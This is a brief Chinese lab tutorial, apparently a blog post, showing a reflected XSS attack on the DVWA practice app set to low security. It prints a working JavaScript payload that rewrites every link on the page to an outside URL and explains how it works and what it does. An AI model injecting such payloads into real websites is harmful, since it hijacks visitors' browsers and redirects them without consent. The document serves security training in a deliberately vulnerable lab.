1.1 反射型XSS攻击劫持用户浏览器
1.1.1 构造攻击payload
<script> window.onload = function() { var link= document.getElementsByTagName("a"); for(j = 0; j < link.length; j++) { link[j].href= "https://blog.leonshadow.cn"; } } </script>
payload说明:
- JavaScript代码分析onload当网页加载完成时,执行function匿名函数:
- 函数功能: document.getElementsByTagName获取页面中所有的a标签,存放到link数组中,使用for循环将link数组中的所有元素替换为恶意网址。
1.1.2 执行payload
1.1.2.1 DVWA安全级别设为low
1.1.2.2 执行攻击代码
1.1.3 查看攻击效果
执行完成后页面并没有什么异常,刷新也没有问题,但是我们点击页面中任何链接时会发现所有能够点击的链接点击后都会跳转到https://blog.leonshadow.cn

我的微信
如果有技术上的问题可以扫一扫我的微信